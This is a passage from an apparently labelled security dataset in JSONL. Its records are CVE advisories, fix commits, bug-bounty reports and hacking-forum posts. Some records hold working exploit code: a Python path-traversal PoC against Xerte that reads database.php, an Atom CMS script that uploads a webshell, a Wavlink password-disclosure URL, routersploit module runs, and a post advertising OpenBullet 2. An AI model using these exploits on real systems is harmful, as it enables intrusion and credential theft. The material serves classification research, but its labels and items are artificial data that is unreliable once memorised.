Homepage: https://xerte.org.uk\n# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip\n# Version: up until 3.10.3\n# Tested on: Windows 10 XAMP\n# CVE : CVE-2021-44665\n\n# This PoC assumes guest login is enabled. Vulnerable url:\n# https:///getfile.php?file=/../../database.php\n# You can find a userfiles-directory by creating a project and browsing the media menu.\n# Create new project from template -> visit \"Properties\" (! symbol) -> Media and Quota -> Click file to download\n# The userfiles-direcotry will be noted in the URL and/or when you download a file.\n# They look like: --\n\nimport requests\nimport re\n\nxerte_base_url = \"http://127.0.0.1\"\nfile_to_grab = \"/../../database.php\"\nphp_session_id = \"\" # If guest is not enabled, and you have a session ID. Put it here.\n\nwith requests.Session() as session:\n # Get a PHP session ID\n if not php_session_id:\n session.get(xerte_base_url)\n else:\n session.cookies.set(\"PHPSESSID\", php_session_id)\n\n # Use a default template\n data = {\n 'tutorialid': 'Nottingham',\n 'templatename': 'Nottingham',\n 'tutorialname': 'exploit',\n 'folder_id': ''\n }\n\n # Create a new project in order to create a user-folder\n template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)\n\n # Find template ID\n data = {\n 'template_id': re.findall('(\\d+)', template_id.text)[0]\n }\n\n # Find the created user-direcotry:\n user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)\n user_direcotry = re.findall('USER-FILES\\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]\n\n # Grab file\n result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)\n print(result.text)\n print(\"|-- Used Variables: --|\")\n print(\"PHP Session ID: \" + session.cookies.get_dict()['PHPSESSID'])\n print(\"user direcotry: \" + user_direcotry)\n print(\"Curl example:\")\n print('curl --cookie \"PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '\" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)", "source": "exploitdb", "timestamp": "2022-03-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b994e6365f4f235f0cca", "text": "Bundler allows attacker to inject arbitrary code via secondary Gem source\n\n[Severity: CRITICAL]\n\nBundler 1.x might allow remote attackers to inject arbitrary Ruby code into an application by leveraging a gem name collision on a secondary source. NOTE: this might overlap CVE-2013-0334.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "89b832f065747cde17f6", "text": "CVE: CVE-2022-1345\n\n[{'lang': 'en', 'value': \"Stored XSS viva .svg file upload in GitHub repository causefx/organizr prior to 2.1.1810. This allows attackers to execute malicious scripts in the user's browser and it can lead to session hijacking, sensitive data exposure, and worse.\"}]\n\nFix commit: added sanitizeUserString and sanitizeEmail functions\nadded sanitize to uploaded image names\nadded sanitize to tabs, categories, users and bookmarks\nremoved svg files from approved image lists", "source": "cvefixes", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "091694db03151870cbee", "text": "CVE: CVE-2021-3856\n\n[{'lang': 'en', 'value': 'ClassLoaderTheme and ClasspathThemeResourceProviderFactory allows reading any file available as a resource to the classloader. By sending requests for theme resources with a relative path from an external HTTP client, the client will receive the content of random files if available.'}]\n\nFix commit: [KEYCLOAK-19422] ClassLoaderTheme and ClasspathThemeResourceProviderFactory allows reading any file available as a resource to the classloader", "source": "cvefixes", "timestamp": "2022-08-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4f43cb327ee0cd705917", "text": "CVE: CVE-2022-23578\n\n[{'lang': 'en', 'value': 'Tensorflow is an Open Source Machine Learning Framework. If a graph node is invalid, TensorFlow can leak memory in the implementation of `ImmutableExecutorState::Initialize`. Here, we set `item->kernel` to `nullptr` but it is a simple `OpKernel*` pointer so the memory that was previously allocated to it would leak. The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.'}]\n\nFix commit: Fix memory leak when a graph node is invalid.\n\nIf a graph node is invalid but a kernel is created then we set the kernel back to `nullptr` but we forget to delete it. Hence, we get a memory leak.\n\nPiperOrigin-RevId: 408968108\nChange-Id: I1d8a9d0d8988ed5e08be8b9f2004ce1b4cd11b7c", "source": "cvefixes", "timestamp": "2022-02-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "473ae382954d7543cfd7", "text": "Have you found how to decode ? I’m approaching the same problem", "source": "hackthebox", "timestamp": "2023-11-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3f3e64506159811b52e2", "text": "Research Project Low-level attack on HTTP\n\nHi, I hope everyone is okay. I am doing a research project for my Bachelor of IT (honours) on Machine Learning for Cloud Security. I will be installing Oracle Virtualbox on my Macbook pro (32GB RAM, 1TB SSD, i7 Quad-Core). In addition, I will be using Kali Linux, an MS Windows Server 2019 as a Domain Controller, an MS-Windows Server as a Webserver with a website hosted on it. An MS Windows 10 machine as a Client workstation. There will be another MS Windows server to capture all the network traffic, primarily HTTP altogether; there will be four servers and one client machine. All of these machines will be installed and configured in the Oracle Virtualbox. Using the Kali Linux machine, I will perform a low-intensity DDoS attack on the HTTP protocol of the MS Windows webserver. The Kali machine will be on a separate network address as I want to show that the attacker is attacking from outside the network. Rest all the rest of servers will be on the same network address I want to perform a low-level intensity attack on the HTTP protocol. This attack will be made on the webserver. The standalone server will be part of the domain controller on which I want to capture network traffic. The reason for capturing network traffic is to run Support Vector Machine (SVM) on it for training and then run SVM for testing. Training can be one script, and testing can be another script. Now my query is How is it possible to perform an attack from one separate network to another different network resource? Is there any good tools or script to perform a low-level intensity attack on the HTTP protocol on an MS Windows webserver? The attack is performed on the webserver, and I want to capture network traffic on another standalone server. How it can be done, and which software or tools should I use.? I shall be highly grateful if someone can guide me in this. Thanks & Regard, Osama Faheem", "source": "go4expert", "timestamp": "2022-03-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "57a7d69bc77acdad51e5", "text": "No, it is not possible to determine who was included in the Bcc field of an email you received. Recipients who are included in the Bcc field are hidden from all other recipients of the email, including those in the \"To:\" and \"Cc:\" fields. The purpose of the Bcc field is to enable the sender to include recipients without disclosing their identities to others on the email thread. This can be useful for situations where the sender wants to send an email to multiple recipients, but does not want all of them to know who else received the message. If you were not included in the Bcc field of the email, there is no way for you to see who was included in that field.", "source": "go4expert", "timestamp": "2023-04-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c934451f951ad95b95cf", "text": "Improper Restriction of XML External Entity Reference in Apache Solr\n\n[Severity: HIGH]\n\nThe (1) UpdateRequestHandler for XSLT or (2) XPathEntityProcessor in Apache Solr before 4.1 allows remote attackers to have an unspecified impact via XML data containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, different vectors than CVE-2013-6407.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d4e85c96f0efe35d9eea", "text": "How to bypass Cloudflare and see real Hosting IP\n\nI want to see some website more information, like real hosting IP/name. It’s been behind Cloudflare I tried tools from Github like Cloudmare/Cloudunflare which cannot figure out any information from that website. “Cloudfail” have some errors when I try to run python script on website. Is there any recon tool on parrot which I can try? Or any method which shows me more information about this website. (I don’t want to share website publicly, but could on PM if needed. It’s seems btw good secure website.", "source": "parrotsec", "timestamp": "2022-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2373c584178c891f85ad", "text": "CVE: CVE-2022-23596\n\n[{'lang': 'en', 'value': 'Junrar is an open source java RAR archive library. In affected versions A carefully crafted RAR archive can trigger an infinite loop while extracting said archive. The impact depends solely on how the application uses the library, and whether files can be provided by malignant users. The problem is patched in 7.4.1. There are no known workarounds and users are advised to upgrade as soon as possible.'}]\n\nFix commit: fix: invalid subheader type would throw npe and make the extract loop\n\ncloses #73", "source": "cvefixes", "timestamp": "2022-02-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e35f967af309d4e9a4a1", "text": "CVE: CVE-2022-1330\n\n[{'lang': 'en', 'value': 'stored xss due to unsantized anchor url in GitHub repository alvarotrigo/fullpage.js prior to 4.0.4. stored xss .'}]\n\nFix commit: Merge pull request #4360 from ranjit-git/ranjit-git-patch-1\n\nRanjit git patch 1", "source": "cvefixes", "timestamp": "2022-04-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "aaa765007b95dd5cfc9a", "text": "Uh the MacBook Pro usually for stuff Windows X Server if anything “What are youre programs?” Open Server 10 Visual Studio Outlook Email Windows X Server Hackintosh — cofee 4 conversation but theres no almond", "source": "hackersploit", "timestamp": "2022-05-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4aecd7c1b137631f65f8", "text": "Wavlink WN530HG4 - Password Disclosure\n\n# Exploit Title: Wavlink WN530HG4 - Password Disclosure\n# Date: 2022-06-12\n# Exploit Author: Ahmed Alroky\n# Author Company : AIactive\n# Version: M30HG4.V5030.191116\n# Vendor home page : wavlink.com\n# Authentication Required: No\n# CVE : CVE-2022-34047\n# Tested on: Windows\n\n# Exploit\n\nview-source:http://IP_address/set_safety.shtml?r=52300\nsearch for var syspasswd=\"\nyou will find the username and the password", "source": "exploitdb", "timestamp": "2022-08-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "701b586922d5996c5753", "text": "CVE: CVE-2021-45933\n\n[{'lang': 'en', 'value': 'wolfSSL wolfMQTT 1.9 has a heap-based buffer overflow (8 bytes) in MqttDecode_Publish (called from MqttClient_DecodePacket and MqttClient_HandlePacket).'}]\n\nFix commit: Fix wolfmqtt-fuzzer: Null-dereference WRITE in MqttProps_Free", "source": "cvefixes", "timestamp": "2022-01-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c2a67729cb685da1816d", "text": "I am also getting the VMWare-42 xx xx xx bunch of numbers if I get it from WMIC in command or get-wmiobject in powershell. Does anyone have any good advice on this?", "source": "hackthebox", "timestamp": "2022-09-17", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a3fd00cd89e640360dd1", "text": "CVE: CVE-2022-1544\n\n[{'lang': 'en', 'value': 'Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data.'}]\n\nFix commit: Merge pull request #7 from luyadev/csv-sanitizer\n\nCsv sanitizer", "source": "cvefixes", "timestamp": "2022-05-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "93d20f1de0a594425ccd", "text": "did you try to grep the output of the error.log file ??", "source": "hackthebox", "timestamp": "2022-09-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b2a4df7e2738a7743756", "text": "The target is the one you get from “spawn target” in the Questions section. The Wireshark file offered in the ressources it’s only to get the image file, after that you spawn a target and connect to it USING no machine and realize an active scan from there. Check for a POST request there after a few minutes of scan.", "source": "hackthebox", "timestamp": "2022-04-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "09d77b3325752322d54e", "text": "CVE: CVE-2022-28796\n\n[{'lang': 'en', 'value': 'jbd2_journal_wait_updates in fs/jbd2/transaction.c in the Linux kernel before 5.17.1 has a use-after-free caused by a transaction_t race condition.'}]\n\nFix commit: jbd2: fix use-after-free of transaction_t race\n\njbd2_journal_wait_updates() is called with j_state_lock held. But if\nthere is a commit in progress, then this transaction might get committed\nand freed via jbd2_journal_commit_transaction() ->\njbd2_journal_free_transaction(), when we release j_state_lock.\nSo check for journal->j_running_transaction everytime we release and\nacquire j_state_lock to avoid use-after-free issue.\n\nLink: https://lore.kernel.org/r/948c2fed518ae739db6a8f7f83f1d58b504f87d0.1644497105.git.ritesh.list@gmail.com\nFixes: 4f98186848707f53 (\"jbd2: refactor wait logic for transaction updates into a common function\")\nCc: stable@kernel.org\nReported-and-tested-by: syzbot+afa2ca5171d93e44b348@syzkaller.appspotmail.com\nReviewed-by: Jan Kara \nSigned-off-by: Ritesh Harjani \nSigned-off-by: Theodore Ts'o ", "source": "cvefixes", "timestamp": "2022-04-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "74a8605514b09a0390f4", "text": "Just grabbed the last flag. Upgrading the shell is necessary for the last flag, I used a static solution mentioned in the previous link. Happy to help others if desired.", "source": "hackthebox", "timestamp": "2022-12-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "22c2917bc1e3bd144b69", "text": "Bolt Cross-site Scripting via the slug, teaser or title parameters\n\n[Severity: MEDIUM]\n\nBolt 3.6.4 has XSS via the slug, teaser, or title parameter to `editcontent/pages`, a related issue to CVE-2017-11128 and CVE-2018-19933.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "273bf95940e07fad3ee4", "text": "OpenBullet 2 V0.2.4\n\n300×177 9.31 KB Install the Microsoft .NET 6 (desktop apps version) from Download .NET 6.0 Download Link : Site Hunter OpenBullet 2 V0.2.4 VirusTotal: virustotal.com VirusTotal VirusTotal Password Unrar is 1", "source": "hackthebox", "timestamp": "2022-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a2f113b6dfd0f396ee4b", "text": "Atom CMS 2.0 - Remote Code Execution (RCE)\n\n# Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)\n# Date: 22.03.2022\n# Exploit Author: Ashish Koli (Shikari)\n# Vendor Homepage: https://thedigitalcraft.com/\n# Software Link: https://github.com/thedigicraft/Atom.CMS\n# Version: 2.0\n# Tested on: Ubuntu 20.04.3 LTS\n# CVE: CVE-2022-25487\n\n# Description\nThis script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell.\n\n# Usage : python3 exploit.py \n# Example: python3 exploit.py 127.0.0.1 80 /atom\n\n# POC Exploit: https://youtu.be/qQrq-eEpswc\n# Note: Crafted \"Shell.txt\" file is required for exploitation which is available on the below link:\n# https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC\n\n'''\nDescription:\nA file upload functionality in Atom CMS 2.0 allows any\nnon-privileged user to gain access to the host through the uploaded files,\nwhich may result in remote code execution.\n'''\n\n#!/usr/bin/python3\n'''\nImport required modules:\n'''\nimport sys\nimport requests\nimport json\nimport time\nimport urllib.parse\nimport struct\nimport re\nimport string\nimport linecache\n\n\n\nproxies = {\n 'http': 'http://localhost:8080',\n 'https': 'https://localhost:8080',\n}\n\n'''\nUser Input:\n'''\ntarget_ip = sys.argv[1]\ntarget_port = sys.argv[2]\natomcmspath = sys.argv[3]\n\n\n'''\nGet cookie\n'''\nsession = requests.Session()\nlink = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin'\nresponse = session.get(link)\ncookies_session = session.cookies.get_dict()\ncookie = json.dumps(cookies_session)\ncookie = cookie.replace('\"}','')\ncookie = cookie.replace('{\"', '')\ncookie = cookie.replace('\"', '')\ncookie = cookie.replace(\" \", '')\ncookie = cookie.replace(\":\", '=')\n\n'''\nUpload Webshell:\n'''\n# Construct Header:\nheader1 = {\n 'Host': target_ip,\n 'Accept': 'application/json',\n 'Cache-Control': 'no-cache',\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',\n 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',\n 'Origin': 'http://' + target_ip,\n 'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9',\n 'Cookie': cookie,\n 'Connection': 'close',\n\n}\n\n\n# loading Webshell payload:\npath = 'shell.txt'\nfp = open(path,'rb')\ndata= fp.read()\n\n\n# Uploading Webshell:\nlink_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1'\nupload = requests.post(link_upload, headers=header1, data=data)\n\np=upload.text\nx = re.sub(\"\\s\", \"\\n\", p)\ny = x.replace(\"1
    Unknown\", \"null\")\nz = re.sub('[^0-9]', '', y)\n\n'''\nFinish:\n'''\nprint('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php')\nprint('')", "source": "exploitdb", "timestamp": "2022-03-30", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "feaf28fef83333f1fe64", "text": "[Improper Synchronization] CVE-2023-28320: siglongjmp race condition\n\n## Summary:\nIf the system has no POSIX or Windows threading support, `USE_ALARM_TIMEOUT` codepath will be used in `lib/hostip.c`. If two threads will perform DNS resolving, a wrong register context can be used on the signal handler`siglongjmp` call if DNS timeout occurs. Typically this results in segmentation fault, but depending on platform specifics other impacts might be possible (but unlikely).\n\nThe documentation warns against this very issue in https://curl.se/libcurl/c/threadsafe.html `It is important that libcurl can find and use thread safe versions of these and other system calls, as otherwise it cannot function fully thread safe.` The issue is that there is no way for the application using libcurl to know if the library is MT safe for DNS resolution or not. `CURL_VERSION_THREADSAFE` is mentioned, but this checks availability of atomic init, not MT safety of DNS resolution.\n\nA remote attacker in a privileged network position is able to selectively block the DNS responses and may thus induce the affected target application to crash.\n\n## Steps To Reproduce:\n\n 1. For quick testing on POSIX systems add `#define USE_ALARM_TIMEOUT` to `lib/hostip.c`, for example:\n ```\ndiff --git a/lib/hostip.c b/lib/hostip.c\nindex 2381290fd..0148f2861 100644\n--- a/lib/hostip.c\n+++ b/lib/hostip.c\n@@ -75,6 +75,7 @@\n /* alarm-based timeouts can only be used with all the dependencies satisfied */\n #define USE_ALARM_TIMEOUT\n #endif\n+#define USE_ALARM_TIMEOUT\n\n #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */\n\n ```\n 2. Compile libcurl\n 3. Compile version of https://curl.se/libcurl/c/multithread.html but add `curl_easy_setopt(curl, CURLOPT_TIMEOUT, 2);` to `pull_one_url` function.\n 4. Change DNS config to point to blackhole DNS server at `3.219.212.117` (blackhole.webpagetest.org)\n 5. Execute the compiled `multithread` and the application will segfault.\n\n```\n$ LD_LIBRARY_PATH=./lib/.libs:$LD_LIBRARY_PATH gdb ./multithread\nGNU gdb (Debian 13.1-2) 13.1\nCopyright (C) 2023 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later \nThis is free software: you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\nType \"show copying\" and \"show warranty\" for details.\nThis GDB was configured as \"x86_64-linux-gnu\".\nType \"show configuration\" for configuration details.\nFor bug reporting instructions, please see:\n.\nFind the GDB manual and other documentation resources online at:\n .\n\nFor help, type \"help\".\nType \"apropos word\" to search for commands related to \"word\"...\nReading symbols from ./multithread...\n(No debugging symbols found in ./multithread)\n(gdb) r\nStarting program: /home/user/curl/multithread\n/home/user/curl/multithread: ./lib/.libs/libcurl.so.4: no version information available (required by /home/user/curl/multithread)\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\n[New Thread 0x7ffff6ffc6c0 (LWP 2733684)]\nThread 0, gets http://curl.haxx.se/\n[New Thread 0x7ffff67fb6c0 (LWP 2733685)]\nThread 1, gets ftp://cool.haxx.se/\n[New Thread 0x7ffff5ffa6c0 (LWP 2733686)]\n[New Thread 0x7ffff57f96c0 (LWP 2733687)]\nThread 2, gets http://www.contactor.se/\n[New Thread 0x7ffff4ff86c0 (LWP 2733688)]\n[New Thread 0x7fffe77fe6c0 (LWP 2733690)]\n[New Thread 0x7fffe7fff6c0 (LWP 2733689)]\nThread 3, gets www.haxx.se\n[New Thread 0x7fffe6ffd6c0 (LWP 2733691)]\n\nThread 1 \"multithread\" received signal SIGSEGV, Segmentation fault.\n0x00007ffff7f42b32 in Curl_failf () from ./lib/.libs/libcurl.so.4\n(gdb) bt\n#0 0x00007ffff7f42b32 in Curl_failf () from ./lib/.libs/libcurl.so.4\n#1 0x00007ffff7f546dd in Curl_resolv_timeout () from ./lib/.libs/libcurl.so.4\n#2 0x0000000000000000 in ?? ()\n```\n\n## Risk discussion\nI don't consider this issue a major risk since it likely will affect only small percentage of target platforms. Some ", "source": "hackerone", "timestamp": "2023-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "310b00314b4dd7459422", "text": "CVE: CVE-2022-31101\n\n[{'lang': 'en', 'value': \"prestashop/blockwishlist is a prestashop extension which adds a block containing the customer's wishlists. In affected versions an authenticated customer can perform SQL injection. This issue is fixed in version 2.1.1. Users are advised to upgrade. There are no known workarounds for this issue.\"}]\n\nFix commit: Merge pull request from GHSA-2jx3-5j9v-prpp\n\nValidate order by and order way", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5a5791cae2ffc6c93cf1", "text": "curl -s https://www.inlanefreight.com | grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\" | sort -u | wc -l Description: curl -s retrieves the HTML content of the webpage https://www.inlanefreight.com in a silent mode without showing progress meter or error messages. grep -Eo \"(http|https)://[a-zA-Z0-9./?=_-]*\" searches for all the links within the HTML content of the webpage by matching the regular expression (http|https)://[a-zA-Z0-9./?=_-]* . This regular expression matches any string that starts with http:// or https:// followed by any combination of letters, digits, slashes, question marks, underscores, and dashes. sort -u sorts and removes any duplicate links from the output. wc -l counts the number of lines in the output, which represents the total number of unique links found on the webpage.", "source": "hackthebox", "timestamp": "2023-05-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "90fdb424554e5cf08933", "text": "I didn’t understand. alternative web connection sir? You mean any internet connection to download drivers…", "source": "parrotsec", "timestamp": "2022-12-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "7b1c907affa9f3471a92", "text": "how to pentest a CISCO ISR 4331 with routersploit, when this model of router is not included in routersploits list of routers it can exploit\n\nHey there I’m trying to pentest a CISCO ISR 4331 using routersploit. But this model of router is not on the list of routers routersploit has available to exploit. when I try running routersploit running the autopwn on this router I just get the following results. All creds and routers “not vulnerable” except these ones below. “IP” Could not verify exploitability : http exploits/routers/asus/asuwart_lan_rce http exploits/routers/shuttle/915wm_dns_change http exploits/routers/netgear/dgn2200-dnslookup_cgi_rce custom/tcp exploits/routers/cisco/catalyst_2960_rocem http exploits/routers/cisco/secure_acs_bypass http exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change http exploits/routers/dlink/dsl_2640b_dns_change http exploits/routers/dlink/dsl_2740r_dns_change custom/udp exploits/routers/dlink/dir_815_850l_rce http exploits/routers/billion/billion_5200w_rce http exploits/routers/3com/officeconnect_rce I’m having trouble finding YouTube video or manual that explain how to properly investigate these links that cannot be verified. I also get mixed signals from these links even they they are not the same models as my router. After exploring all the options while writing this question Im pretty sure none if them can be used to pen test a CISCO 4331 ISR so any links or advice on how i can do this with routersploit or any other program would be appreciated. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// -rsf (3Com OfficeConnect RCE) > use exploits/routers/asus/asuswrt_lan_rce rsf (AsusWRT Lan RCE) > show options Target options: Name Current settings Description ssl false SSL enabled: true/false target Target IPv4 or IPv6 address port 80 Target HTTP port Module options: Name Current settings Description verbosity true Enable verbose output: true/false infosvr_port 9999 Target InfoSVR Port rsf (AsusWRT Lan RCE) > set target [+] target => rsf (AsusWRT Lan RCE) > set target ip [+] target => rsf (AsusWRT Lan RCE) > run [*] Running module exploits/routers/asus/asuswrt_lan_rce… [-] Connection error: http::80/vpnupload.cgi [-] Failed to set ateCommand_flag variable =>[dont know what to do here] ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// rsf (AsusWRT Lan RCE) > use exploits/routers/shuttle/915wm_dns_change rsf (Shuttle 915 WM DNS Change) > set target ip [+] target => ip rsf (Shuttle 915 WM DNS Change) > show options Target options: Name Current settings Description ssl false SSL enabled: true/false target ip Target IPv4 or IPv6 address port 80 Target HTTP port Module options: Name Current settings Description verbosity true Verbosity enabled: true/false dns1 8.8.8.8 Primary DNS Server dns2 8.8.4.4 Seconary DNS Server rsf (Shuttle 915 WM DNS Change) > run [ ] Running module exploits/routers/shuttle/915wm_dns_change… [ ] Attempting to change DNS settings… [ ] Primary DNS: 8.8.8.8 [ ] Secondary DNS: 8.8.4.4 [-] Connection error: http://ip:80/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1 =>[dont know what to do here] ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// rsf (Shuttle 915 WM DNS Change) > use exploits/routers/netgear/dgn2200_dnslookup_cgi_rce rsf (Netgear DGN2200 RCE) > set target “ip” [+] target => “ip” rsf (Netgear DGN2200 RCE) > show options Target options: Name Current settings Description ssl false SSL enabled: true/false target Target IPv4 or IPv6 address port 80 Target HTTP port Module options: Name Current settings Description verbosity true Verbosity enabled: true/false username admin Username password password Password rsf (Netg", "source": "hackersploit", "timestamp": "2022-10-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d8e13574ecd56537a8ef", "text": "I have a different problem, I dont get any errors but I don’t see any hashes at all, I am using kali not parrot", "source": "hackthebox", "timestamp": "2022-08-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e1688d334eb0f1782979", "text": "Hey guys a little help please. I see the the flag1.txt in the history of htb-student. But it is actually not present. please help", "source": "hackthebox", "timestamp": "2023-03-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0d6a0f4335c6f1a2a62f", "text": "I just found a solution for us, you can’t upload files to the windows virtual machine in the usual way but we can indirectly upload the upload_win.zip file to the windows server, what you need to do is: 1)encode the file upload_win.zip with the system you used to download it in base64 2)copy the base64 string you just got and use the following command at the parrot-htb virtual machine to get the original .zip file: echo | base64 -d -w 0 > upload_win.zip 3)you run http server service at parrot virtual machine 4)RDP to the window virtual machine and download the file upload_win.zip from the parrot virtual machine by the command in module => you will have .zip file in your Windows VM", "source": "hackthebox", "timestamp": "2022-03-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "86203e57a72b6ba1200f", "text": "netstat -l4t | awk ‘{print $4, $6}’ | grep 0.0.0.* | wc -l", "source": "hackthebox", "timestamp": "2023-07-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "6cf7ca12679cb004911e", "text": "CVE: CVE-2021-20298\n\n[{'lang': 'en', 'value': \"A flaw was found in OpenEXR's B44Compressor. This flaw allows an attacker who can submit a crafted file to be processed by OpenEXR, to exhaust all memory accessible to the application. The highest threat from this vulnerability is to system availability.\"}]\n\nFix commit: reduce B44 _tmpBufferSize (was allocating two bytes per byte) (#843)\n\nSigned-off-by: Peter Hillman ", "source": "cvefixes", "timestamp": "2022-08-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ae4e9b1ca95d310e4f32", "text": "[Insufficiently Protected Credentials] Credential leak on redirect\n\n## Summary:\n[add summary of the vulnerability]\n\nCurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect , like the Proxy-Authorization 、x-auth-token header. It is a bypass of fix https://hackerone.com/reports/1547048 , CVE-2022-27776 .\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. Create a 302.php file, such as:\n```\n\n```\nAdd the 2 record in the /etc/hosts file: \n```\n127.0.0.1 a.com\n127.0.0.1 b.com\n```\n 2. curl -H \"Proxy-Authorization: secrettoken\" http://b.com/302.php -vv -L \nThe redirect will be followed, and the confidential headers sent over insecure HTTP to the specified port:\n```\n# curl -H \"Proxy-Authorization: secrettoken\" http://b.com/302.php -vv -L\n* Trying 127.0.0.1:80...\n* Connected to b.com (127.0.0.1) port 80 (#0)\n> GET /302.php HTTP/1.1\n> Host: b.com\n> User-Agent: curl/7.83.1\n> Accept: */*\n> Proxy-Authorization: secrettoken\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 302 Found\n< Date: Fri, 13 May 2022 11:22:06 GMT\n< Server: Apache/2.4.6 (CentOS) PHP/5.4.16\n< X-Powered-By: PHP/5.4.16\n< Location: http://a.com:8000\n< Content-Length: 0\n< Content-Type: text/html; charset=UTF-8\n<\n* Connection #0 to host b.com left intact\n* Clear auth, redirects to port from 80 to 8000\n* Issue another request to this URL: 'http://a.com:8000/'\n* Trying 127.0.0.1:8000...\n* Connected to a.com (127.0.0.1) port 8000 (#1)\n> GET / HTTP/1.1\n> Host: a.com:8000\n> User-Agent: curl/7.83.1\n> Accept: */*\n> Proxy-Authorization: secrettoken\n>\n```\n 3. curl -H \"x-auth-token: secrettoken\" http://b.com/302.php -vv -L \n```\n# curl -H \"x-auth-token: secrettoken\" http://b.com/302.php -vv -L\n* Trying 127.0.0.1:80...\n* Connected to b.com (127.0.0.1) port 80 (#0)\n> GET /302.php HTTP/1.1\n> Host: b.com\n> User-Agent: curl/7.83.1\n> Accept: */*\n> x-auth-token: secrettoken\n>\n* Mark bundle as not supporting multiuse\n< HTTP/1.1 302 Found\n< Date: Fri, 13 May 2022 11:24:15 GMT\n< Server: Apache/2.4.6 (CentOS) PHP/5.4.16\n< X-Powered-By: PHP/5.4.16\n< Location: http://a.com:8000\n< Content-Length: 0\n< 